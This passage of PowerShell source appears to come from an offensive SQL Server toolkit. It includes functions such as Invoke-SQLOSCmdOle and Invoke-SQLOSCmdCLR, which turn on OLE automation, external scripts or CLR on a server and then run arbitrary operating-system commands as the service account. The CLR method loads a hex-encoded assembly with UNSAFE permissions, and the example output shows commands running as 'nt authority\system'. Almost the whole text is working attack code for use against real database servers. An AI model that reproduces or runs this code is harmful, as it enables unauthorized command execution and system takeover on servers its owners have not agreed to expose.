$Username -Password $Password -Credential $Credential -SuppressVerbose | Select-Object -ExpandProperty value_in_use if($EnabledInRunValue -eq 0){ Write-Verbose -Message "$Instance : The 'external scripts enabled' setting is not enabled in runtime." Write-Verbose -Message "$Instance : - The SQL Server service will need to be manually restarted for the change to take effect." Write-Verbose -Message "$Instance : - Not recommended unless you're the DBA." $null = $TblResults.Rows.Add("$ComputerName","$Instance",'External scripts not enabled in runtime.') return }else{ Write-Verbose -Message "$Instance : The 'external scripts enabled' setting is enabled in runtime.'" } # Setup query to run command write-verbose "$instance : Executing command: $Command" $QueryCmdExecute = @" EXEC sp_execute_external_script @language =N'Python', @script=N' import subprocess p = subprocess.Popen(`"cmd.exe /c $Command`", stdout=subprocess.PIPE) OutputDataSet = pandas.DataFrame([str(p.stdout.read(), `"utf-8`")])' WITH RESULT SETS (([Output] nvarchar(max))) "@ # Execute query $CmdResults = Get-SQLQuery -Instance $Instance -Query $QueryCmdExecute -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | select Output -ExpandProperty Output # Display results or add to final results table if($RawResults) { $CmdResults } else { $null = $TblResults.Rows.Add($ComputerName, $Instance, [string]$CmdResults.trim()) } # Restore external scripts state if needed if($DisableExternalScripts -eq 1) { Write-Verbose -Message "$Instance : Disabling external scripts" Get-SQLQuery -Instance $Instance -Query "sp_configure 'external scripts enabled',0;RECONFIGURE WITH OVERRIDE" -Username $Username -Password $Password -Credential $Credential -SuppressVerbose } # Restore Show Advanced Options state if needed if($DisableShowAdvancedOptions -eq 1) { Write-Verbose -Message "$Instance : Disabling Show Advanced Options" Get-SQLQuery -Instance $Instance -Query "sp_configure 'Show Advanced Options',0;RECONFIGURE" -Username $Username -Password $Password -Credential $Credential -SuppressVerbose } # Close connection $Connection.Close() # Dispose connection $Connection.Dispose() } catch { # Connection failed if(-not $SuppressVerbose) { $ErrorMessage = $_.Exception.Message Write-Verbose -Message "$Instance : Connection Failed." #Write-Verbose " Error: $ErrorMessage" } # Add record $null = $TblResults.Rows.Add("$ComputerName","$Instance",'Not Accessible or Command Failed') } } # Run scriptblock using multi-threading $PipelineItems | Invoke-Parallel -ScriptBlock $MyScriptBlock -ImportSessionFunctions -ImportVariables -Throttle $Threads -RunspaceTimeout 2 -Quiet -ErrorAction SilentlyContinue return $TblResults } } # ---------------------------------- # Invoke-SQLOSCmdOle # ---------------------------------- # Author: Scott Sutherland # Reference: https://technet.microsoft.com/en-us/library/ee156605.aspx # Reference: https://docs.microsoft.com/en-us/sql/database-engine/configure-windows/ole-automation-procedures-server-configuration-option Function Invoke-SQLOSCmdOle { <# .SYNOPSIS Execute command on the operating system as the SQL Server service account using OLE automation procedures. Supports threading, raw output, and table output. .PARAMETER Username SQL Server or domain account to authenticate with. .PARAMETER Password SQL Server or domain account password to authenticate with. .PARAMETER Credential SQL Server credential. .PARAMETER Instance SQL Server instance to connection to. .PARAMETER DAC Connect using Dedicated Admin Connection. .PARAMETER TimeOut Connection time out. .PARAMETER SuppressVerbose Suppress verbose errors. Used when function is wrapped. .PARAMETER Threads Number of concurrent threads. .PARAMETER Command Operating command to be executed on the SQL Server. .PARAMETER RawResults Just show the raw results without the computer or instance name. .EXAMPLE PS C:\> Get-SQLInstanceLocal | Invoke-SQLOSCmdOle -Verbose -Command "whoami" VERBOSE: Creating runspace pool and session states VERBOSE: MSSQLSRV04 : Connection Failed. VERBOSE: MSSQLSRV04\BOSCHSQL : Connection Success. VERBOSE: MSSQLSRV04\BOSCHSQL : You are not a sysadmin. This command requires sysadmin privileges. VERBOSE: MSSQLSRV04\SQLSERVER2014 : Connection Success. VERBOSE: MSSQLSRV04\SQLSERVER2014 : You are a sysadmin. VERBOSE: MSSQLSRV04\SQLSERVER2014 : Show Advanced Options is already enabled. VERBOSE: MSSQLSRV04\SQLSERVER2014 : OLE Automation Procedues are already enabled. VERBOSE: MSSQLSRV04\SQLSERVER2014 : Running command: whoami VERBOSE: MSSQLSRV04\SQLSERVER2016 : Connection Failed. VERBOSE: Closing the runspace pool ComputerName Instance CommandResults ------------ -------- -------------- MSSQLSRV04 MSSQLSRV04\BOSCHSQL No sysadmin privileges. MSSQLSRV04 MSSQLSRV04\SQLSERVER2014 nt authority\system MSSQLSRV04 MSSQLSRV04\SQLSERVER2016 Not Accessible .EXAMPLE PS C:\> Invoke-SQLOSCmdOle -Verbose -Instance MSSQLSRV04\SQLSERVER2014 -Command "whoami" -RawResults VERBOSE: Creating runspace pool and session states VERBOSE: MSSQLSRV04\SQLSERVER2014 : Connection Success. VERBOSE: MSSQLSRV04\SQLSERVER2014 : You are a sysadmin. VERBOSE: MSSQLSRV04\SQLSERVER2014 : Show Advanced Options is disabled. VERBOSE: MSSQLSRV04\SQLSERVER2014 : Enabled Show Advanced Options. VERBOSE: MSSQLSRV04\SQLSERVER2014 : Ole Automation Procedures are disabled. VERBOSE: MSSQLSRV04\SQLSERVER2014 : Enabled Ole Automation Procedures. VERBOSE: MSSQLSRV04\SQLSERVER2014 : Executing command: whoami VERBOSE: MSSQLSRV04\SQLSERVER2014 : Reading command output from c:\windows\temp\OlHZP.txt VERBOSE: MSSQLSRV04\SQLSERVER2014 : Removing file c:\windows\temp\OlHZP.txt VERBOSE: MSSQLSRV04\SQLSERVER2014 : Disabling 'Ole Automation Procedures VERBOSE: MSSQLSRV04\SQLSERVER2014 : Disabling Show Advanced Options nt authority\system VERBOSE: Closing the runspace pool #> [CmdletBinding()] Param( [Parameter(Mandatory = $false, HelpMessage = 'SQL Server or domain account to authenticate with.')] [string]$Username, [Parameter(Mandatory = $false, HelpMessage = 'SQL Server or domain account password to authenticate with.')] [string]$Password, [Parameter(Mandatory = $false, HelpMessage = 'Windows credentials.')] [System.Management.Automation.PSCredential] [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, [Parameter(Mandatory = $false, ValueFromPipeline = $true, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server instance to connection to.')] [string]$Instance, [Parameter(Mandatory = $false, HelpMessage = 'Connect using Dedicated Admin Connection.')] [Switch]$DAC, [Parameter(Mandatory = $true, HelpMessage = 'OS command to be executed.')] [String]$Command = "whoami", [Parameter(Mandatory = $false, HelpMessage = 'Connection timeout.')] [string]$TimeOut, [Parameter(Mandatory = $false, HelpMessage = 'Number of threads.')] [int]$Threads = 1, [Parameter(Mandatory = $false, HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] [switch]$SuppressVerbose, [Parameter(Mandatory = $false, HelpMessage = 'Just show the raw results without the computer or instance name.')] [switch]$RawResults ) Begin { # Setup data table for output $TblCommands = New-Object -TypeName System.Data.DataTable $TblResults = New-Object -TypeName System.Data.DataTable $null = $TblResults.Columns.Add('ComputerName') $null = $TblResults.Columns.Add('Instance') $null = $TblResults.Columns.Add('CommandResults') # Setup data table for pipeline threading $PipelineItems = New-Object -TypeName System.Data.DataTable # set instance to local host by default if(-not $Instance) { $Instance = $env:COMPUTERNAME } # Ensure provided instance is processed if($Instance) { $ProvideInstance = New-Object -TypeName PSObject -Property @{ Instance = $Instance } } # Add instance to instance list $PipelineItems = $PipelineItems + $ProvideInstance } Process { # Create list of pipeline items $PipelineItems = $PipelineItems + $_ } End { # Define code to be multi-threaded $MyScriptBlock = { $Instance = $_.Instance # Parse computer name from the instance $ComputerName = Get-ComputerNameFromInstance -Instance $Instance # Default connection to local default instance if(-not $Instance) { $Instance = $env:COMPUTERNAME } # Setup DAC string if($DAC) { # Create connection object $Connection = Get-SQLConnectionObject -Instance $Instance -Username $Username -Password $Password -Credential $Credential -DAC -TimeOut $TimeOut } else { # Create connection object $Connection = Get-SQLConnectionObject -Instance $Instance -Username $Username -Password $Password -Credential $Credential -TimeOut $TimeOut } # Attempt connection try { # Open connection $Connection.Open() if(-not $SuppressVerbose) { Write-Verbose -Message "$Instance : Connection Success." } # Switch to track Ole Automation Procedures status $DisableShowAdvancedOptions = 0 $DisableOle = 0 # Get sysadmin status $IsSysadmin = Get-SQLSysadminCheck -Instance $Instance -Credential $Credential -Username $Username -Password $Password -SuppressVerbose | Select-Object -Property IsSysadmin -ExpandProperty IsSysadmin # Check if OLE Automation Procedures are enabled if($IsSysadmin -eq 'Yes') { Write-Verbose -Message "$Instance : You are a sysadmin." $IsOleEnabled = Get-SQLQuery -Instance $Instance -Query "sp_configure 'Ole Automation Procedures'" -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Select-Object -Property config_value -ExpandProperty config_value $IsShowAdvancedEnabled = Get-SQLQuery -Instance $Instance -Query "sp_configure 'Show Advanced Options'" -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Select-Object -Property config_value -ExpandProperty config_value } else { Write-Verbose -Message "$Instance : You are not a sysadmin. This command requires sysadmin privileges." # Add record $null = $TblResults.Rows.Add("$ComputerName","$Instance",'No sysadmin privileges.') return } # Enable show advanced options if needed if ($IsShowAdvancedEnabled -eq 1) { Write-Verbose -Message "$Instance : Show Advanced Options is already enabled." } else { Write-Verbose -Message "$Instance : Show Advanced Options is disabled." $DisableShowAdvancedOptions = 1 # Try to enable Show Advanced Options Get-SQLQuery -Instance $Instance -Query "sp_configure 'Show Advanced Options',1;RECONFIGURE" -Username $Username -Password $Password -Credential $Credential -SuppressVerbose # Check if configuration change worked $IsShowAdvancedEnabled2 = Get-SQLQuery -Instance $Instance -Query "sp_configure 'Show Advanced Options'" -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Select-Object -Property config_value -ExpandProperty config_value if ($IsShowAdvancedEnabled2 -eq 1) { Write-Verbose -Message "$Instance : Enabled Show Advanced Options." } else { Write-Verbose -Message "$Instance : Enabling Show Advanced Options failed. Aborting." # Add record $null = $TblResults.Rows.Add("$ComputerName","$Instance",'Could not enable Show Advanced Options.') return } } # Enable OLE Automation Procedures if needed if ($IsOleEnabled -eq 1) { Write-Verbose -Message "$Instance : Ole Automation Procedures are already enabled." } else { Write-Verbose -Message "$Instance : Ole Automation Procedures are disabled." $DisableOle = 1 # Try to enable Ole Automation Procedures Get-SQLQuery -Instance $Instance -Query "sp_configure 'Ole Automation Procedures',1;RECONFIGURE" -Username $Username -Password $Password -Credential $Credential -SuppressVerbose # Check if configuration change worked $IsOleEnabled2 = Get-SQLQuery -Instance $Instance -Query 'sp_configure "Ole Automation Procedures"' -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Select-Object -Property config_value -ExpandProperty config_value if ($IsOleEnabled2 -eq 1) { Write-Verbose -Message "$Instance : Enabled Ole Automation Procedures." } else { Write-Verbose -Message "$Instance : Enabling Ole Automation Procedures failed. Aborting." # Add record $null = $TblResults.Rows.Add("$ComputerName","$Instance",'Could not enable Ole Automation Procedures.') return } } # Setup output file $OutputDir = 'c:\windows\temp' $OutputFile = (-join ((65..90) + (97..122) | Get-Random -Count 5 | % {[char]$_})) $OutputPath = "$outputdir\$outputfile.txt" # Setup query to run command write-verbose "$instance : Executing command: $Command" $QueryCmdExecute = @" DECLARE @Shell INT DECLARE @Output varchar(8000) EXEC @Output = Sp_oacreate 'wscript.shell', @Shell Output, 5 EXEC Sp_oamethod @shell, 'run' , null, 'cmd.exe /c "$Command > $OutputPath"' "@ # Execute query $null = Get-SQLQuery -Instance $Instance -Query $QueryCmdExecute -Username $Username -Password $Password -Credential $Credential -SuppressVerbose # Setup query for reading command output write-verbose "$instance : Reading command output from $OutputPath" $QueryReadCommandOutput = @" DECLARE @fso INT DECLARE @file INT DECLARE @o int DECLARE @f int DECLARE @ret int DECLARE @FileContents varchar(8000) EXEC Sp_oacreate 'scripting.filesystemobject' , @fso Output, 5 EXEC Sp_oamethod @fso, 'opentextfile' , @file Out, '$OutputPath',1 EXEC sp_oacreate 'scripting.filesystemobject', @o out EXEC sp_oamethod @o, 'opentextfile', @f out, '$OutputPath', 1 EXEC @ret = sp_oamethod @f, 'readall', @FileContents out SELECT @FileContents as output "@ # Execute query $CmdResults = Get-SQLQuery -Instance $Instance -Query $QueryReadCommandOutput -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Select-Object -Property output -ExpandProperty output # Remove file write-verbose "$instance : Removing file $OutputPath" $QueryRemoveFile = @" DECLARE @Shell INT EXEC Sp_oacreate 'wscript.shell' , @shell Output, 5 EXEC Sp_oamethod @Shell, 'run' , null, 'cmd.exe /c "del $OutputPath"' , '0' , 'true' "@ # Run query $null = Get-SQLQuery -Instance $Instance -Query $QueryRemoveFile -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Select-Object -Property output -ExpandProperty output # Display results or add to final results table if($RawResults) { $CmdResults | Select output -ExpandProperty output } else { $null = $TblResults.Rows.Add($ComputerName, $Instance, [string]$CmdResults.trim()) } # Restore 'Ole Automation Procedures state if needed if($DisableOle -eq 1) { Write-Verbose -Message "$Instance : Disabling 'Ole Automation Procedures" Get-SQLQuery -Instance $Instance -Query "sp_configure 'Ole Automation Procedures',0;RECONFIGURE" -Username $Username -Password $Password -Credential $Credential -SuppressVerbose } # Restore Show Advanced Options state if needed if($DisableShowAdvancedOptions -eq 1) { Write-Verbose -Message "$Instance : Disabling Show Advanced Options" Get-SQLQuery -Instance $Instance -Query "sp_configure 'Show Advanced Options',0;RECONFIGURE" -Username $Username -Password $Password -Credential $Credential -SuppressVerbose } # Close connection $Connection.Close() # Dispose connection $Connection.Dispose() } catch { # Connection failed if(-not $SuppressVerbose) { $ErrorMessage = $_.Exception.Message Write-Verbose -Message "$Instance : Connection Failed." #Write-Verbose " Error: $ErrorMessage" } # Add record $null = $TblResults.Rows.Add("$ComputerName","$Instance",'Not Accessible or Command Failed') } } # Run scriptblock using multi-threading $PipelineItems | Invoke-Parallel -ScriptBlock $MyScriptBlock -ImportSessionFunctions -ImportVariables -Throttle $Threads -RunspaceTimeout 2 -Quiet -ErrorAction SilentlyContinue return $TblResults } } # ---------------------------------- # Invoke-SQLOSCmdCLR # ---------------------------------- # Author: Scott Sutherland # References: This was built of off work done by Lee Christensen (@tifkin_) and Nathan Kirk (@sekirkity). # Reference: http://sekirkity.com/seeclrly-fileless-sql-server-clr-based-custom-stored-procedure-command-execution/ # Reference: https://msdn.microsoft.com/en-us/library/microsoft.sqlserver.server.sqlpipe.sendresultsrow(v=vs.110).aspx Function Invoke-SQLOSCmdCLR { <# .SYNOPSIS Execute command on the operating system as the SQL Server service account using a generated CLR assembly with CREATE ASSEMBLY and CREATE PROCEDURE. Supports threading, raw output, and table output. .PARAMETER Username SQL Server or domain account to authenticate with. .PARAMETER Password SQL Server or domain account password to authenticate with. .PARAMETER Credential SQL Server credential. .PARAMETER Instance SQL Server instance to connection to. .PARAMETER DAC Connect using Dedicated Admin Connection. .PARAMETER TimeOut Connection time out. .PARAMETER SuppressVerbose Suppress verbose errors. Used when function is wrapped. .PARAMETER Threads Number of concurrent threads. .PARAMETER Command Operating command to be executed on the SQL Server. .PARAMETER RawResults Just show the raw results without the computer or instance name. .EXAMPLE PS C:\> Get-SQLInstanceLocal | Invoke-SQLOSCmdCLR -Verbose -Command "whoami" VERBOSE: Creating runspace pool and session states VERBOSE: MSSQLSRV04 : Connection Failed. VERBOSE: MSSQLSRV04\BOSCHSQL : Connection Success. VERBOSE: MSSQLSRV04\BOSCHSQL : You are not a sysadmin. This command requires sysadmin privileges. VERBOSE: MSSQLSRV04\SQLSERVER2014 : Connection Success. VERBOSE: MSSQLSRV04\SQLSERVER2014 : You are a sysadmin. VERBOSE: MSSQLSRV04\SQLSERVER2014 : Show Advanced Options is already enabled. VERBOSE: MSSQLSRV04\SQLSERVER2014 : CLR is already enabled. VERBOSE: MSSQLSRV04\SQLSERVER2014 : Running command: whoami VERBOSE: MSSQLSRV04\SQLSERVER2016 : Connection Failed. VERBOSE: Closing the runspace pool ComputerName Instance CommandResults ------------ -------- -------------- MSSQLSRV04 MSSQLSRV04\BOSCHSQL No sysadmin privileges. MSSQLSRV04 MSSQLSRV04\SQLSERVER2014 nt authority\system MSSQLSRV04 MSSQLSRV04\SQLSERVER2016 Not Accessible #> [CmdletBinding()] Param( [Parameter(Mandatory = $false, HelpMessage = 'SQL Server or domain account to authenticate with.')] [string]$Username, [Parameter(Mandatory = $false, HelpMessage = 'SQL Server or domain account password to authenticate with.')] [string]$Password, [Parameter(Mandatory = $false, HelpMessage = 'Windows credentials.')] [System.Management.Automation.PSCredential] [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, [Parameter(Mandatory = $false, ValueFromPipeline = $true, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server instance to connection to.')] [string]$Instance, [Parameter(Mandatory = $false, HelpMessage = 'Connect using Dedicated Admin Connection.')] [Switch]$DAC, [Parameter(Mandatory = $true, HelpMessage = 'OS command to be executed.')] [String]$Command, [Parameter(Mandatory = $false, HelpMessage = 'Connection timeout.')] [string]$TimeOut, [Parameter(Mandatory = $false, HelpMessage = 'Number of threads.')] [int]$Threads = 1, [Parameter(Mandatory = $false, HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] [switch]$SuppressVerbose, [Parameter(Mandatory = $false, HelpMessage = 'Just show the raw results without the computer or instance name.')] [switch]$RawResults ) Begin { # Setup data table for output $TblCommands = New-Object -TypeName System.Data.DataTable $TblResults = New-Object -TypeName System.Data.DataTable $null = $TblResults.Columns.Add('ComputerName') $null = $TblResults.Columns.Add('Instance') $null = $TblResults.Columns.Add('CommandResults') # Setup data table for pipeline threading $PipelineItems = New-Object -TypeName System.Data.DataTable # set instance to local host by default if(-not $Instance) { $Instance = $env:COMPUTERNAME } # Ensure provided instance is processed if($Instance) { $ProvideInstance = New-Object -TypeName PSObject -Property @{ Instance = $Instance } } # Add instance to instance list $PipelineItems = $PipelineItems + $ProvideInstance } Process { # Create list of pipeline items $PipelineItems = $PipelineItems + $_ } End { # Define code to be multi-threaded $MyScriptBlock = { $Instance = $_.Instance # Parse computer name from the instance $ComputerName = Get-ComputerNameFromInstance -Instance $Instance # Default connection to local default instance if(-not $Instance) { $Instance = $env:COMPUTERNAME } # Setup DAC string if($DAC) { # Create connection object $Connection = Get-SQLConnectionObject -Instance $Instance -Username $Username -Password $Password -Credential $Credential -DAC -TimeOut $TimeOut } else { # Create connection object $Connection = Get-SQLConnectionObject -Instance $Instance -Username $Username -Password $Password -Credential $Credential -TimeOut $TimeOut } # Attempt connection try { # Open connection $Connection.Open() if(-not $SuppressVerbose) { Write-Verbose -Message "$Instance : Connection Success." } # Switch to track CLR status $DisableShowAdvancedOptions = 0 $DisableCLR = 0 # Get sysadmin status $IsSysadmin = Get-SQLSysadminCheck -Instance $Instance -Credential $Credential -Username $Username -Password $Password -SuppressVerbose | Select-Object -Property IsSysadmin -ExpandProperty IsSysadmin # Check if CLR is enabled if($IsSysadmin -eq 'Yes') { Write-Verbose -Message "$Instance : You are a sysadmin." $IsCLREnabled = Get-SQLQuery -Instance $Instance -Query "sp_configure 'CLR Enabled'" -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Select-Object -Property config_value -ExpandProperty config_value $IsShowAdvancedEnabled = Get-SQLQuery -Instance $Instance -Query "sp_configure 'Show Advanced Options'" -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Select-Object -Property config_value -ExpandProperty config_value } else { Write-Verbose -Message "$Instance : You are not a sysadmin. This command requires sysadmin privileges." # Add record $null = $TblResults.Rows.Add("$ComputerName","$Instance",'No sysadmin privileges.') return } # Enable show advanced options if needed if ($IsShowAdvancedEnabled -eq 1) { Write-Verbose -Message "$Instance : Show Advanced Options is already enabled." } else { Write-Verbose -Message "$Instance : Show Advanced Options is disabled." $DisableShowAdvancedOptions = 1 # Try to enable Show Advanced Options Get-SQLQuery -Instance $Instance -Query "sp_configure 'Show Advanced Options',1;RECONFIGURE" -Username $Username -Password $Password -Credential $Credential -SuppressVerbose # Check if configuration change worked $IsShowAdvancedEnabled2 = Get-SQLQuery -Instance $Instance -Query "sp_configure 'Show Advanced Options'" -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Select-Object -Property config_value -ExpandProperty config_value if ($IsShowAdvancedEnabled2 -eq 1) { Write-Verbose -Message "$Instance : Enabled Show Advanced Options." } else { Write-Verbose -Message "$Instance : Enabling Show Advanced Options failed. Aborting." # Add record $null = $TblResults.Rows.Add("$ComputerName","$Instance",'Could not enable Show Advanced Options.') return } } # Enable CLR if needed if ($IsCLREnabled -eq 1) { Write-Verbose -Message "$Instance : CLR is already enabled." } else { Write-Verbose -Message "$Instance : CLR is disabled." $DisableCLR = 1 # Try to enable CLR Get-SQLQuery -Instance $Instance -Query "sp_configure 'CLR Enabled',1;RECONFIGURE" -Username $Username -Password $Password -Credential $Credential -SuppressVerbose # Check if configuration change worked $IsCLREnabled2 = Get-SQLQuery -Instance $Instance -Query 'sp_configure "CLR Enabled"' -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Select-Object -Property config_value -ExpandProperty config_value if ($IsCLREnabled2 -eq 1) { Write-Verbose -Message "$Instance : Enabled CLR." } else { Write-Verbose -Message "$Instance : Enabling CLR failed. Aborting." # Add record $null = $TblResults.Rows.Add("$ComputerName","$Instance",'Could not enable CLR.') return } } # Set random length $RandAssemblyLength = (8..15 | Get-Random -count 1 ) # Create assembly and proc names $RandAssemblyName = (-join ((65..90) + (97..122) | Get-Random -Count $RandAssemblyLength | % {[char]$_})) $RandProcName = (-join ((65..90) + (97..122) | Get-Random -Count $RandAssemblyLength | % {[char]$_})) Write-Verbose -Message "$Instance : Assembly name: $RandAssemblyName" Write-Verbose -Message "$Instance : CLR Procedure name: $RandProcName" # Create assembly $Query_AddAssembly = "CREATE ASSEMBLY [$RandAssemblyName] AUTHORIZATION [dbo] from 0x4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000800000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A2400000000000000504500004C010300652F55590000000000000000E00002210B0108000008000000060000000000004E270000002000000040000000004000002000000002000004000000000000000400000000000000008000000002000000000000030040850000100000100000000010000010000000000000100000000000000000000000002700004B00000000400000A002000000000000000000000000000000000000006000000C00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000200000080000000000000000000000082000004800000000000000000000002E7465787400000054070000002000000008000000020000000000000000000000000000200000602E72737263000000A00200000040000000040000000A0000000000000000000000000000400000402E72656C6F6300000C0000000060000000020000000E000000000000000000000000000040000042000000000000000000000000000000003027000000000000480000000200050028210000D8050000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000013300600C30000000100001100730400000A0A066F0500000A72010000706F0600000A00066F0500000A72390000700F00280700000A280800000A6F0900000A00066F0500000A166F0A00000A00066F0500000A176F0B00000A00066F0C00000A26178D090000010C081672490000701F0C20A00F00006A730D00000AA208730E00000A0B280F00000A076F1000000A000716066F1100000A6F1200000A6F1300000A6F1400000A00280F00000A076F1500000A00280F00000A6F1600000A00066F1700000A00066F1800000A002A1E02281900000A2A0042534A4201000100000000000C00000076322E302E35303732370000000005006C000000E0010000237E00004C0200009002000023537472696E677300000000DC040000580000002355530034050000100000002347554944000000440500009400000023426C6F620000000000000002000001471502000900000000FA013300160000010000000F000000020000000200000001000000190000000300000001000000010000000300000000000A000100000000000600370030000A005F004A000600980078000600B80078000A00F900DE000E002E011B010E0036011B0106006C0130000A00BD01DE000A00C9013E000A00D301DE000A00E101DE000A00EC01DE00060018020E02060038020E0200000000010000000000010001000100100016000000050001000100502000000000960069000A0001001F21000000008618720010000200000001000F01190072001400210072001000290072001000310072001000310047011E00390055012300110062012800410073012C0039007A01230039008801320039009C0132003100B7013700490072003B005900720043006100F4014A006900FD014F0031002502550079004302280009004D022800590056025A00690060024F0069006F02100031007E02100031008A02100009007200100020001B0019002E000B006A002E00130073006000048000000000000000000000000000000000D6000000020000000000000000000000010027000000000002000000000000000000000001003E000000000002000000000000000000000001003000000000000000003C4D6F64756C653E00636C7266696C652E646C6C0053746F72656450726F63656475726573006D73636F726C69620053797374656D004F626A6563740053797374656D2E446174610053797374656D2E446174612E53716C54797065730053716C537472696E6700636D645F65786563002E63746F720053797374656D2E52756E74696D652E436F6D70696C6572536572766963657300436F6D70696C6174696F6E52656C61786174696F6E734174747269627574650052756E74696D65436F6D7061746962696C69747941747472696275746500636C7266696C65004D6963726F736F66742E53716C5365727665722E5365727665720053716C50726F6365647572654174747269627574650065786563436F6D6D616E640053797374656D2E446961676E6F73746963730050726F636573730050726F636573735374617274496E666F006765745F5374617274496E666F007365745F46696C654E616D65006765745F56616C756500537472696E6700466F726D6174007365745F417267756D656E7473007365745F5573655368656C6C45786563757465007365745F52656469726563745374616E646172644F75747075740053746172740053716C4D657461446174610053716C4462547970650053716C446174615265636F72640053716C436F6E746578740053716C50697065006765745F506970650053656E64526573756C747353746172740053797374656D2E494F0053747265616D526561646572006765745F5374616E646172644F757470757400546578745265616465720052656164546F456E6400546F537472696E6700536574537472696E670053656E64526573756C7473526F770053656E64526573756C7473456E640057616974466F724578697400436C6F736500003743003A005C00570069006E0064006F00770073005C00530079007300740065006D00330032005C0063006D0064002E00650078006500000F20002F00430020007B0030007D00000D6F007500740070007500740000002A5DFE759C75BA4399A49F834BF07EE50008B77A5C561934E0890500010111090320000104200101080401000000042000121D042001010E0320000E0500020E0E1C042001010203200002072003010E11290A062001011D1225040000123505200101122D042000123905200201080E0907031219122D1D12250801000800000000001E01000100540216577261704E6F6E457863657074696F6E5468726F77730100002827000000000000000000003E270000002000000000000000000000000000000000000000000000302700000000000000005F436F72446C6C4D61696E006D73636F7265652E646C6C0000000000FF25002040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100100000001800008000000000000000000000000000000100010000003000008000000000000000000000000000000100000000004800000058400000440200000000000000000000440234000000560053005F00560045005200530049004F004E005F0049004E0046004F0000000000BD04EFFE00000100000000000000000000000000000000003F000000000000000400000002000000000000000000000000000000440000000100560061007200460069006C00650049006E0066006F00000000002400040000005400720061006E0073006C006100740069006F006E00000000000000B004A4010000010053007400720069006E006700460069006C00650049006E0066006F0000008001000001003000300030003000300034006200300000002C0002000100460069006C0065004400650073006300720069007000740069006F006E000000000020000000300008000100460069006C006500560065007200730069006F006E000000000030002E0030002E0030002E003000000038000C00010049006E007400650072006E0061006C004E0061006D006500000063006C007200660069006C0065002E0064006C006C0000002800020001004C006500670061006C0043006F00700079007200690067006800740000002000000040000C0001004F0072006900670069006E0061006C00460069006C0065006E0061006D006500000063006C007200660069006C0065002E0064006C006C000000340008000100500072006F006400750063007400560065007200730069006F006E00000030002E0030002E0030002E003000000038000800010041007300730065006D0062006C0079002000560065007200730069006F006E00000030002E0030002E0030002E00300000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000C000000503700000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 with permission_set = UNSAFE" Get-SQLQuery -Instance $Instance -Query $Query_AddAssembly -Username $Username -Password $Password -Credential $Credential -SuppressVerbose -Database "MSDB" # Create procedure $Query_AddProc = "CREATE PROCEDURE [dbo].[$RandProcName] @execCommand NVARCHAR (MAX) AS EXTERNAL NAME [$RandAssemblyName].[StoredProcedures].[cmd_exec];" Get-SQLQuery -Instance $Instance -Query $Query_AddProc -Username $Username -Password $Password -Credential $Credential -SuppressVerbose -Database "MSDB" # Setup OS command Write-Verbose -Message "$Instance : Running command: $Command" $Query = "EXEC [$RandProcName] '$Command'" # Execute OS command $CmdResults = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential -SuppressVerbose -Database "MSDB" # Display results or add to final results table if($RawResults) { [string]$CmdResults.output } else { try { $null = $TblResults.Rows.Add($ComputerName, $Instance, [string]$CmdResults.output) } catch { } } # Remove procedure and assembly Get-SQLQuery -Instance $Instance -Query "DROP PROCEDURE $RandProcName" -Username $Username -Password $Password -Credential $Credential -SuppressVerbose -Database "MSDB" Get-SQLQuery -Instance $Instance -Query "DROP ASSEMBLY $RandAssemblyName" -Username $Username -Password $Password -Credential $Credential -SuppressVerbose -Database "MSDB" # Restore CLR state if needed if($DisableCLR -eq 1) { Write-Verbose -Message "$Instance : Disabling CLR" Get-SQLQuery -Instance $Instance -Query "sp_configure 'CLR Enabled',0;RECONFIGURE" -Username $Username -Password $Password -Credential $Credential -SuppressVerbose } # Restore Show Advanced Options state if needed if($DisableShowAdvancedOptions -eq 1) { Write-Verbose -Message "$Instance : Disabling Show Advanced Options" Get-SQLQuery -Instance $Instance -Query "sp_configure 'Show Advanced Options',0;RECONFIGURE" -Username $Username -Password $Password -Credential $Credential 